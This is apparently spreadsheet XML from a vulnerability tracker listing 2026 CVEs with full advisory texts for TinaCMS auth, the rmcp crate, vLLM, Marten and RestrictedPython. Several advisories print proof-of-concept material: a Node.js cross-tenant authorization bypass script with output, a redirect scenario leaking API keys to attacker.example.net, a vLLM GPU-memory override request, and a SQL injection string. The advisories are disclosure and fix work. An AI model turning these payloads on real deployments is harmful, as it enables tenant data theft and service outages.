/* ===== verbatim from @tinacms/auth/src/index.ts (types stripped) ===== */
const isUserAuthorized = async (args) =&gt; {
  const clientID = args.clientID;
  const token = args.token;
  try {
    const tinaCloudRes = await fetch(
      `${process.env.IDENTITY_BASE || 'https://identity.tinajs.io'}/v2/apps/${clientID}/currentUser`,
      {
        headers: new Headers({ 'Content-Type': 'application/json', authorization: token }),
        method: 'GET',
      }
    );
    if (tinaCloudRes.ok) {
      const user = await tinaCloudRes.json();
      return user;
    }
    return;
  } catch (e) {
    console.error(e);
    throw e;
  }
};
const isAuthorized = async (req) =&gt; {
  const clientID = req.query.clientID;       // &lt;-- attacker-controlled
  const token = req.headers.authorization;   // &lt;-- attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
/* ===== identity model: a token grants access to the app its owner owns =====
   This is NOT the vulnerable part. It scopes tokens to apps correctly. The bug
   is that the victim lets the caller choose which app to validate against.     */
const TOKEN_FOR = {
  'victim-app': 'valid-token-for-victim-app',
  'attacker-app': 'valid-token-for-attacker-app',
};
const USER_FOR = {
  'victim-app': { id: 'u-victim', email: 'owner@victim.example', verified: true, role: 'admin' },
  'attacker-app': { id: 'u-attacker', email: 'attacker@evil.example', verified: true, role: 'admin' },
};
const identity = http.createServer((req, res) =&gt; {
  const m = req.url.match(/^\/v2\/apps\/([^/]+)\/currentUser$/);
  if (!m) { res.writeHead(404); return res.end('nf'); }
  const app = decodeURIComponent(m[1]);
  if (TOKEN_FOR[app] &amp;&amp; req.headers['authorization'] === TOKEN_FOR[app]) {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify(USER_FOR[app]));
  }
  res.writeHead(401, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ message: 'unauthorized for this app' }));
});
/* ===== victim site (own clientID = victim-app), verbatim media-store README callback ===== */
const authorized = async (req) =&gt; {
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;             // never checks req.query.clientID === victim-app
};
const victim = http.createServer(async (req, res) =&gt; {
  const u = new URL(req.url, `http://127.0.0.1:${VICTIM_PORT}`);
  req.query = Object.fromEntries(u.searchParams.entries());
  if (!u.pathname.startsWith('/api/cloudinary/media')) { res.writeHead(404); return res.end('nf'); }
  if (!(await authorized(req))) {
    res.writeHead(401, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({ message: 'sorry this user is unauthorized' }));
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ authorized: true, site: 'victim-app',
    media: ['victim/private/contract.pdf', 'victim/private/customers.csv'] }));
});
/* ===== driver ===== */
function call(clientID, token) {
  return new Promise((resolve) =&gt; {
    const r = http.request({ host: '127.0.0.1', port: VICTIM_PORT,
      path: `/api/cloudinary/media?clientID=${encodeURIComponent(clientID)}`,
      method: 'GET', headers: { authorization: token } }, (res) =&gt; {
      let b = ''; res.on('data', (c) =&gt; (b += c));
      res.on('end', () =&gt; resolve({ status: res.statusCode, body: b }));
    });
    r.on('error', (e) =&gt; resolve({ status: 0, body: String(e) })); r.end();
  });
}
(async () =&gt; {
  await new Promise((r) =&gt; identity.listen(IDENTITY_PORT, '127.0.0.1', r));
  await new Promise((r) =&gt; victim.listen(VICTIM_PORT, '127.0.0.1', r));
  const c1 = await call('victim-app', 'valid-token-for-victim-app');
  console.log('[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt;', c1.status, c1.body);
  const c2 = await call('victim-app', 'valid-token-for-attacker-app');
  console.log('[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt;', c2.status, c2.body);
  const atk = await call('attacker-app', 'valid-token-for-attacker-app');
  console.log('[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt;', atk.status, atk.body);
  const bug = c1.status === 200 &amp;&amp; c2.status === 401 &amp;&amp; atk.status === 200;
  console.log('\nVERDICT:', bug
    ? 'VULNERABLE — attacker authorized on victim site with credentials only for their own app.'
    : 'NOT REPRODUCED');
  identity.close(); victim.close();
  process.exit(bug ? 0 : 1);
})();
```
Output:
```
[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt; 401 {"message":"sorry this user is unauthorized"}
[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
VERDICT: VULNERABLE - attacker authorized on victim site with credentials only for their own app.
```
CONTROL 1 (200) shows the identity model is faithful, not a blanket allow. CONTROL 2 (401) shows the attacker cannot reach the victim's app with their own token. ATTACK (200) shows that naming their own app id, which their own token matches, passes the victim's gate and returns the victim's private media.
I verified the full chain in source at the audited commit and reproduced the code logic deterministically with the PoC above. I did not run the end-to-end attack against production `identity.tinajs.io` with two real accounts and a live deployment; that step needs two real accounts and a deployment. The one assumption it rests on, that `GET /v2/apps/&lt;attacker-app&gt;/currentUser` with the attacker's own token returns `200` + `verified:true`, is the normal behavior of an app owner's own session.
## Impact
An attacker with a free TinaCloud account reaches editor-level control of unrelated tenants:
- **Media handlers:** list and read media, upload arbitrary objects (`next-tinacms-dos` writes `ACL: public-read`, usable to host malware or phishing under the victim's CDN), and delete media by key.
- **`TinaCloudBackendAuthProvider` backend:** arbitrary GraphQL. Read every document, `createDocument` / `updateDocument` to deface or inject content that deploys to production, and `deleteDocument` to destroy content.
The attacker scripts requests with their own token and `clientID=&lt;own app&gt;` against known TinaCMS self-hosted endpoints, so it scales across deployments.
## Fix
Bind the decision to the site's own configured app id instead of the request value.
```diff
- export const isAuthorized = async (req: NextApiRequest) =&gt; {
-   const clientID = req.query.clientID;
-   const token = req.headers.authorization;
+ export const isAuthorized = async (req: NextApiRequest, expectedClientID?: string) =&gt; {
+   const requestClientID = req.query.clientID;
+   const token = req.headers.authorization;
+   const clientID = expectedClientID ?? process.env.NEXT_PUBLIC_TINA_CLIENT_ID;
+   if (expectedClientID &amp;&amp; requestClientID &amp;&amp; requestClientID !== expectedClientID) {
+     return undefined; // refuse a cross-tenant clientID
+   }
    if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
      return await isUserAuthorized({ clientID, token });
    }
    return undefined;
  };
```
Thread the site's configured `clientID` into `TinaCloudBackendAuthProvider()` and the media handler config, require `isUserAuthorized` to use it rather than `req.query.clientID`, apply the same change to `next-tinacms-azure/src/auth.ts`, and update the media-store READMEs so integrators stop reintroducing the request-driven `clientID`.</t>
        </is>
      </c>
      <c r="T1086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63506</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64684</t>
        </is>
      </c>
      <c r="D1087" s="5" t="inlineStr"/>
      <c r="E1087" s="5" t="inlineStr"/>
      <c r="F1087" s="5" t="inlineStr"/>
      <c r="G1087" s="5" t="inlineStr"/>
      <c r="H1087" s="5" t="inlineStr"/>
      <c r="I1087" s="5" t="inlineStr"/>
      <c r="J1087" s="5" t="inlineStr"/>
      <c r="K1087" s="5" t="inlineStr"/>
      <c r="L1087" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M1087" s="5" t="inlineStr">
        <is>
          <t>2.1.0</t>
        </is>
      </c>
      <c r="N1087" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1087" s="5" t="inlineStr"/>
      <c r="P1087" s="5" t="inlineStr"/>
      <c r="Q1087" s="5" t="inlineStr"/>
      <c r="R1087" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S1087" s="5" t="inlineStr">
        <is>
          <t>## Summary
The `rmcp` crate's `StreamableHttpClientTransport` forwards caller-supplied custom HTTP headers (such as `X-API-Key`, `X-Auth-Token`, `Api-Key`) to cross-origin redirect targets. The `default_http_client()` function builds a `reqwest::Client` without a redirect policy override, so the default `limited(10)` policy follows `307`/`308` redirects and forwards all per-request headers except `Authorization`, `Cookie`, and `Proxy-Authorization`. Custom auth headers injected via `StreamableHttpClientTransportConfig.custom_headers` are not classified as sensitive and are therefore forwarded verbatim to any redirect target — including an attacker-controlled server.
## Affected versions
- Repository: `github.com/modelcontextprotocol/rust-sdk`
- Crate: `rmcp`
- Commit tested: `c330fede90e4729c234f8e87fdbc5ea27a1dd10c` (HEAD, 2026-05-21)
## Vulnerability
**File:** `crates/rmcp/src/transport/common/reqwest/streamable_http_client.rs`
**Root cause 1 — no redirect policy override:**
```rust
// Lines 302-307
fn default_http_client() -&gt; reqwest::Client {
    reqwest::Client::builder()
        .pool_max_idle_per_host(0)
        .build()
        .expect("failed to build default reqwest client")
}
```
No `.redirect(reqwest::redirect::Policy::none())` call. The default `limited(10)` policy follows up to 10 redirects and, on cross-origin redirects, strips only `Authorization`, `Cookie`, and `Proxy-Authorization`.
**Root cause 2 — custom headers not sensitivity-marked:**
```rust
// Lines 26-35
fn apply_custom_headers(
    mut builder: reqwest::RequestBuilder,
    custom_headers: HashMap&lt;HeaderName, HeaderValue&gt;,
) -&gt; Result&lt;reqwest::RequestBuilder, StreamableHttpError&lt;reqwest::Error&gt;&gt; {
    for (name, value) in custom_headers {
        validate_custom_header(&amp;name).map_err(StreamableHttpError::ReservedHeaderConflict)?;
        builder = builder.header(name, value);  // no sensitivity marker
    }
    Ok(builder)
}
```
Headers added via `RequestBuilder::header()` are forwarded to redirect targets because reqwest only strips headers from its own sensitive-header list (`Authorization`, `Cookie`, `Proxy-Authorization`).
**Exposed API:** `StreamableHttpClientTransportConfig.custom_headers` (line 1070), intended for custom auth headers:
```rust
/// Custom HTTP headers to include with every request
pub custom_headers: HashMap&lt;HeaderName, HeaderValue&gt;,
```
## Attack scenario
1. A caller sets `custom_headers` with an API key for the MCP server:
   ```rust
   let config = StreamableHttpClientTransportConfig::with_uri("https://mcp.example.com/mcp")
       .custom_headers([(HeaderName::from_static("x-api-key"),
                         HeaderValue::from_static("my-secret-key"))].into());
   ```
2. An attacker compromises `mcp.example.com` to return `307 Temporary Redirect` to `https://attacker.example.net/capture`.
3. `rmcp` follows the redirect, forwarding `X-API-Key: my-secret-key` to `attacker.example.net`.
4. The attacker captures the secret and reuses it to call the MCP server directly.
## Negative control
The `auth_header` path (`StreamableHttpClientTransportConfig::auth_header()`) sets the value via `builder.bearer_auth(auth_header)`, which maps to the `Authorization` header — stripped by reqwest on cross-origin redirects. That path is not affected. Only `custom_headers` is vulnerable.
## Fix
In `default_http_client()`, disable automatic redirect following:
```rust
fn default_http_client() -&gt; reqwest::Client {
    reqwest::Client::builder()
        .pool_max_idle_per_host(0)
        .redirect(reqwest::redirect::Policy::none())  // &lt;-- add this
        .build()
        .expect("failed to build default reqwest client")
}
```
The transport can then inspect `3xx` responses and decide whether to follow, stripping sensitive headers before doing so. Alternatively, use `reqwest::ClientBuilder::connection_verbose` or per-request `Request::headers_mut()` to remove auth headers before the redirect is followed.</t>
        </is>
      </c>
      <c r="T1087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64684</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69147</t>
        </is>
      </c>
      <c r="D1088" s="5" t="inlineStr"/>
      <c r="E1088" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1088" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1088" s="5" t="inlineStr"/>
      <c r="H1088" s="5" t="inlineStr"/>
      <c r="I1088" s="5" t="inlineStr"/>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr"/>
      <c r="L1088" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M1088" s="5" t="inlineStr">
        <is>
          <t>0.28.0</t>
        </is>
      </c>
      <c r="N1088" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1088" s="5" t="inlineStr"/>
      <c r="P1088" s="5" t="inlineStr"/>
      <c r="Q1088" s="5" t="inlineStr"/>
      <c r="R1088" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S1088" s="5" t="inlineStr">
        <is>
          <t>## Summary
Current vLLM `main` lets an inference request choose the PyNvVideoCodec GPU video decoder through `media_io_kwargs.video.video_backend`, but engine GPU memory reservation is computed only from static startup configuration and `VLLM_VIDEO_LOADER_BACKEND`. If the server starts with the default OpenCV/software backend and no `--mm-ipc-gpu-memory-gb` budget, a client can still route a video request into the PyNvVideoCodec path after startup, causing frontend CUDA-context, decoder-surface, and decoded-frame GPU allocations that were not carved out of the engine KV-cache budget.
## Technical Details
The vulnerable boundary is the split between request-time media decoding choices in the API server and startup-time memory budgeting in the engine worker. Request bodies for Chat Completions and Responses expose `media_io_kwargs`, and those values are forwarded to the shared media connector. For video inputs, `MediaConnector.fetch_video()` copies `self.media_io_kwargs["video"]` into `video_io_kwargs`, only setting a model-derived backend when `video_backend` is absent. `VideoMediaIO.__init__()` then consumes `video_backend` from those kwargs and loads that backend from `VIDEO_LOADER_REGISTRY`.
The relevant request-side source path is:
```python
video_io_kwargs = dict(self.media_io_kwargs.get("video", {}))
if "video_backend" not in video_io_kwargs and (
    video_backend := get_video_loader_backend_for_processor(video_processor)
):
    video_io_kwargs["video_backend"] = video_backend
video_io = VideoMediaIO(image_io, **video_io_kwargs)
```
```python
video_loader_backend = (
    kwargs.pop("video_backend", None) or envs.VLLM_VIDEO_LOADER_BACKEND
)
self.video_loader = VIDEO_LOADER_REGISTRY.load(video_loader_backend)
```
`VideoBackend.load_bytes()` then dispatches `backend == "pynvvideocodec"` into `decode_frames_pynvvideocodec()`, which constructs a PyNvVideoCodec decoder, creates or uses a CUDA stream, reads stream metadata, decodes selected frames on the GPU, and copies those frames into pinned host memory. The new frontend GPU memory pool accounts only for raw decoded frame bytes when a pool exists; it does not make request-time backend selection safe when no startup reservation was made.
The engine-side reservation code makes its decision from static model config and environment only:
```python
def _uses_pynvvideocodec_video_backend(mm_config) -&gt; bool:
    video_kwargs = mm_config.media_io_kwargs.get("video", {})
    video_loader_backend = (
        video_kwargs.get("video_backend") or envs.VLLM_VIDEO_LOADER_BACKEND
    )
    codec_backend = video_kwargs.get("backend")
    return (
        video_loader_backend == PYNVVIDEOCODEC_VIDEO_BACKEND
        or codec_backend == PYNVVIDEOCODEC_VIDEO_BACKEND
    )
```
```python
decoder_reserved_bytes = (
    num_api_servers * per_server_decoder_bytes
    if self._uses_pynvvideocodec_video_backend(mm_config)
    else 0
)
reserved_bytes = raw_frame_reserved_bytes + decoder_reserved_bytes
if reserved_bytes &lt;= 0:
    return available_kv_cache_memory_bytes
```
With default static video configuration, `mm_config.media_io_kwargs["video"]` does not name PyNvVideoCodec and `VLLM_VIDEO_LOADER_BACKEND` defaults to OpenCV/software decoding. The worker therefore reserves no PyNv decoder/CUDA-context bytes. A later request can still set `media_io_kwargs.video.video_backend="pynvvideocodec"` and reach the GPU decoder path because that runtime field is intentionally honored by `VideoMediaIO`.
## PoV
An ordinary multimodal inference request can carry the backend override in the request body:
```json
{
  "model": "served-vlm",
  "messages": [
    {
      "role": "user",
      "content": [
        {"type": "text", "text": "summarize this clip"},
        {"type": "video_url", "video_url": {"url": "data:video/mp4;base64,&lt;small-mp4&gt;"}}
      ]
    }
  ],
  "media_io_kwargs": {
    "video": {
      "video_backend": "pynvvideocodec"
    }
  }
}
```
The following bounded source-level check confirms the code path without allocating GPU memory:
```bash
git clone --filter=blob:none https://github.com/vllm-project/vllm.git
cd vllm
git checkout ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a
python3 check_pynv_backend_reservation.py --repo .
```
## PoC
The bounded check validates current source markers, simulates the exact static reservation predicate, and compares vulnerable and negative-control configurations. Key output:
```json
{
  "vulnerable": true,
  "head": "ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a",
  "reservation_simulation": {
    "env_video_loader_backend": "opencv",
    "request_selects_pynv_after_startup": true,
    "vulnerable_static_reserved_bytes": 0,
    "negative_control_static_pynv_reserved_bytes": 2066953011,
    "raw_frame_only_control_reserved_bytes": 268435456,
    "unreserved_decoder_bytes_when_only_request_selects_pynv": 2066953011
  }
}
```
The negative control is important: when PyNvVideoCodec is selected statically, the worker reserves `2066953011` bytes per API process for decoder surfaces plus CUDA context. The vulnerable case reserves `0` bytes for the same decoder overhead because PyNvVideoCodec is selected only by the later request. A second control with static OpenCV plus `mm_ipc_gpu_memory_gb=0.25` reserves only the raw-frame semaphore budget and still does not reserve PyNv decoder/CUDA-context bytes.
## Impact
An attacker who can submit video requests to a vLLM deployment with PyNvVideoCodec available can force frontend GPU decoding even when the engine did not reserve memory for that decoder during startup. On high-utilization serving deployments, the unreserved CUDA context, retained decoder surfaces, and decoded-frame allocations can reduce or exhaust GPU memory that the engine assumed was available for weights, activations, or KV cache, causing request failures, worker crashes, or service-level denial of service.
Suggested severity is Medium with conservative CVSS v3.1 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (6.5). If a deployment exposes the affected API without authentication, `PR:N` would raise the deployment-specific score. Suggested weaknesses are `CWE-770` (Allocation of Resources Without Limits or Throttling) and `CWE-400` (Uncontrolled Resource Consumption). This should not be rated Low because the affected resource is shared GPU memory in the serving path and the code already treats the PyNv decoder/CUDA-context footprint as large enough to reserve at startup when statically configured.
Limitations: exploitation requires a GPU deployment where PyNvVideoCodec is installed and usable, and the request must reach a video-capable model/path. The issue does not claim code execution, data disclosure, or SSRF.
## Suggested Fix
Do not allow untrusted request fields to select a GPU decoder that was not included in startup memory reservation. The simplest fix is to reject request-level `media_io_kwargs.video.video_backend="pynvvideocodec"` unless the static server configuration already selected PyNvVideoCodec and reserved its decoder/CUDA-context budget.
If dynamic backend selection remains supported, split software and GPU decoder policies: allow request selection among CPU/software decoders only, require an explicit operator allowlist for GPU decoders, and include every request-selectable GPU decoder in the startup reservation predicate. Add regression coverage for static OpenCV startup config plus request-level PyNvVideoCodec override, and preserve the negative control where static PyNvVideoCodec configuration reserves decoder/CUDA-context bytes.
## Affected Package/Versions
Package: `vllm` from `vllm-project/vllm`.
Confirmed affected: current `main` at `ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a`.
Introduced by: `af16446bf39de047ab57649c933063cf1cbf1e50`, `Vram semaphore infra (#44465)`, committed 2026-06-26T17:32:51-07:00.
Release status checked: `git tag --contains af16446bf` returned no release tags in the fresh checkout. GitHub repository metadata reported latest published release `v0.23.0` published 2026-06-15T05:27:20Z; the local `v0.24.0` tag also does not contain the introducing commit. The affected range should therefore be current `main` builds containing `af16446bf` until fixed, rather than a confirmed released-version range.
## Advisory History
Public vLLM advisories checked included audio decompression-bomb DoS, unbounded `video/jpeg` frame-count DoS, MediaConnector SSRF, video processing RCE, multimodal embedding DoS/RCE, GGUF GPU memory exposure, multimodal hashing, and other request-parameter DoS classes. None matched request-selected PyNvVideoCodec or the static VRAM reservation mismatch.
Prior local/private vLLM report families checked included request-level `media_io_kwargs` reopening `video/jpeg` frame fanout, GLM video metadata amplification, and audio media decode duration-limit bypass. Those reports share the request-level media kwargs boundary, but they target CPU/media decode limits or model metadata amplification. This report targets a different privileged asset and fix surface: GPU decoder selection after engine startup memory reservation.
Focused GitHub issue/PR searches for `pynvvideocodec`, `mm_ipc_gpu_memory`, `video_backend media_io_kwargs`, `Vram semaphore infra`, and `frontend multimodal GPU decoding` found the PyNvVideoCodec zero-copy RFC, an old do-not-review prototype, merged PR `#44465`, and an unrelated TorchCodec backend PR. No public issue or PR described this security boundary.
## Appendix: Bounded Source-Level Check
```python
#!/usr/bin/env python3
from __future__ import annotations
import argparse
import json
import re
import subprocess
from pathlib import Path
MIB = 1024 * 1024
GIB = 1024 * MIB
def read(repo: Path, rel: str) -&gt; str:
    return (repo / rel).read_text(encoding="utf-8")
def const_int(source: str, name: str) -&gt; int:
    expr = re.search(rf"^{name}\s*=\s*(.+)$", source, flags=re.MULTILINE).group(1).strip()
    if expr == "128 * MiB_bytes":
        return 128 * MIB
    if expr == "int(1.8 * 1024 * MiB_bytes)":
        return int(1.8 * 1024 * MIB)
    if expr == "1":
        return 1
    raise AssertionError(expr)
def uses_pynv_static(static_media_io_kwargs: dict[str, dict[str, str]], env_backend: str) -&gt; bool:
    video_kwargs = static_media_io_kwargs.get("video", {})
    video_loader_backend = video_kwargs.get("video_backend") or env_backend
    codec_backend = video_kwargs.get("backend")
    return video_loader_backend == "pynvvideocodec" or codec_backend == "pynvvideocodec"
def reserve_bytes(static_media_io_kwargs, env_backend, mm_ipc_gpu_memory_gb, decoder_bytes, cuda_context_bytes, retained_decoders):
    raw_frame_reserved_bytes = int(mm_ipc_gpu_memory_gb * GIB)
    per_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes
    decoder_reserved_bytes = per_server_decoder_bytes if uses_pynv_static(static_media_io_kwargs, env_backend) else 0
    return raw_frame_reserved_bytes + decoder_reserved_bytes
parser = argparse.ArgumentParser()
parser.add_argument("--repo", required=True, type=Path)
repo = parser.parse_args().repo.resolve()
media_video = read(repo, "vllm/multimodal/media/video.py")
connector = read(repo, "vllm/multimodal/media/connector.py")
chat_protocol = read(repo, "vllm/entrypoints/openai/chat_completion/protocol.py")
responses_protocol = read(repo, "vllm/entrypoints/openai/responses/protocol.py")
gpu_worker = read(repo, "vllm/v1/worker/gpu_worker.py")
video_core = read(repo, "vllm/multimodal/video.py")
assert "media_io_kwargs: dict[str, dict[str, Any]] | None = Field(" in chat_protocol
assert "media_io_kwargs: dict[str, dict[str, Any]] | None = Field(" in responses_protocol
assert 'video_io_kwargs = dict(self.media_io_kwargs.get("video", {}))' in connector
assert 'if "video_backend" not in video_io_kwargs and (' in connector
assert 'kwargs.pop("video_backend", None) or envs.VLLM_VIDEO_LOADER_BACKEND' in media_video
assert "elif backend == PYNVVIDEOCODEC_VIDEO_BACKEND:" in video_core
assert 'video_kwargs = mm_config.media_io_kwargs.get("video", {})' in gpu_worker
decoder_bytes = const_int(video_core, "PYNVVIDEOCODEC_DECODER_GPU_MEMORY_BYTES")
retained_decoders = const_int(video_core, "PYNVVIDEOCODEC_MAX_RETAINED_DECODERS")
cuda_context_bytes = const_int(video_core, "PYNVVIDEOCODEC_CUDA_CONTEXT_BYTES")
per_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes
vulnerable_static_reserved = reserve_bytes({}, "opencv", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)
negative_control_reserved = reserve_bytes({"video": {"video_backend": "pynvvideocodec"}}, "opencv", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)
raw_frame_only_control = reserve_bytes({}, "opencv", 0.25, decoder_bytes, cuda_context_bytes, retained_decoders)
head = subprocess.check_output(["git", "-C", str(repo), "rev-parse", "HEAD"], text=True).strip()
print(json.dumps({
    "head": head,
    "vulnerable": vulnerable_static_reserved == 0 and negative_control_reserved == per_server_decoder_bytes,
    "reservation_simulation": {
        "env_video_loader_backend": "opencv",
        "request_selects_pynv_after_startup": True,
        "vulnerable_static_reserved_bytes": vulnerable_static_reserved,
        "negative_control_static_pynv_reserved_bytes": negative_control_reserved,
        "raw_frame_only_control_reserved_bytes": raw_frame_only_control,
        "unreserved_decoder_bytes_when_only_request_selects_pynv": per_server_decoder_bytes,
    },
}, indent=2, sort_keys=True))
```</t>
        </is>
      </c>
      <c r="T1088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69147</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75513</t>
        </is>
      </c>
      <c r="D1089" s="5" t="inlineStr"/>
      <c r="E1089" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1089" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1089" s="5" t="inlineStr"/>
      <c r="H1089" s="5" t="inlineStr"/>
      <c r="I1089" s="5" t="inlineStr"/>
      <c r="J1089" s="5" t="inlineStr"/>
      <c r="K1089" s="5" t="inlineStr"/>
      <c r="L1089" s="5" t="inlineStr">
        <is>
          <t>nuget:Marten</t>
        </is>
      </c>
      <c r="M1089" s="5" t="inlineStr">
        <is>
          <t>9.13.0</t>
        </is>
      </c>
      <c r="N1089" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1089" s="5" t="inlineStr"/>
      <c r="P1089" s="5" t="inlineStr"/>
      <c r="Q1089" s="5" t="inlineStr"/>
      <c r="R1089" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S1089" s="5" t="inlineStr">
        <is>
          <t>Several code paths in Marten's LINQ provider and tenant-management internals interpolated a runtime, potentially attacker-influenced value into generated SQL as a single-quoted string literal without escaping or parameterization. A value containing a single quote (`'`) could break out of the literal and inject arbitrary SQL.
The primary vector is a `Dictionary&lt;,&gt;` indexer **key** used in a `Where` filter — `Where(x =&gt; x.Attributes[key] == v)` — a common "filter by attribute name" / EAV pattern. It is confirmed with an executed proof-of-concept and yields filter / multi-tenant authorization bypass (returning other tenants' rows) and blind data exfiltration. Where the application permits `;`-batched statements (Npgsql default), data modification is also possible.
## Affected sinks
- `Linq/Members/Dictionaries/DictionaryItemMember.cs` — dictionary indexer key (primary, confirmed PoC)
- `Linq/Members/Dictionaries/DictionaryContainsKeyFilter.cs` — `Dictionary.ContainsKey(key)` (Newtonsoft serializer only; System.Text.Json escapes the quote)
- `Linq/Parsing/SelectParser.cs` — a constant string projected through `Select(x =&gt; new { L = runtimeString })`
- `Internal/Operations/DeleteAllForTenant.cs` — tenant id reaching per-tenant projection teardown via `IEventStore.DeleteProjectionProgressAsync` (an in-code comment wrongly claimed the value was validated)
- `Schema/DatabaseScopedTenantPartitions.cs` — tenant id inlined into `FOR VALUES IN ('...')` partition DDL
- `Events/Daemon/Internals/EventLoader.cs` (defense-in-depth) — per-tenant partition-pruning literal
## Proof of concept (primary vector)
Benign: `x.Attributes["nonexistent-key"] == "v"` returns 0 rows. Attack: `x.Attributes["nonexistent' = '' or 1=1 --"] == "v"` returns all rows. Generated SQL:
```
select d.data from public.mt_doc_doc as d where d.data -&gt; 'Attributes' -&gt;&gt; 'x' or 1=1 --' = :p0;
```
## Fix
Each sink now escapes embedded single quotes (`.Replace("'", "''")`, mirroring the existing `Ordering.BuildNgramRankExpression`) or binds the value as a parameter (`DeleteAllForTenant`). Where a literal is retained for partition pruning, escaping preserves plan-time pruning while closing the injection. Regression tests lock down each vector.
## Workarounds
Until upgrading: do not pass untrusted input as a dictionary indexer key / `ContainsKey` argument / `Select` constant, nor as a tenant id into projection teardown or provisioning; and disable multi-statement command batching to limit blast radius.
## Credit
Reported privately and responsibly by an external security researcher with an executed PoC. Additional sinks found during the follow-up LINQ-wide audit.</t>
        </is>
      </c>
      <c r="T1089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75513</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76825</t>
        </is>
      </c>
      <c r="D1090" s="5" t="inlineStr"/>
      <c r="E1090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1090" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1090" s="5" t="inlineStr"/>
      <c r="H1090" s="5" t="inlineStr"/>
      <c r="I1090" s="5" t="inlineStr"/>
      <c r="J1090" s="5" t="inlineStr"/>
      <c r="K1090" s="5" t="inlineStr"/>
      <c r="L1090" s="5" t="inlineStr">
        <is>
          <t>pip:RestrictedPython</t>
        </is>
      </c>
      <c r="M1090" s="5" t="inlineStr">
        <is>
          <t>8.4</t>
        </is>
      </c>
      <c r="N1090" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1090" s="5" t="inlineStr"/>
      <c r="P1090" s="5" t="inlineStr"/>
      <c r="Q1090" s="5" t="inlineStr"/>
      <c r="R1090" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-470, CWE-680, CWE-693</t>
        </is>
      </c>
      <c r="S1090" s="5" t="inlineStr">
        <is>
          <t>### Impact
RestrictedPython could allow a sandbox escape when a policy exposes the standard library `string` module, or otherwise exposes `string.Formatter`, to restricted code.
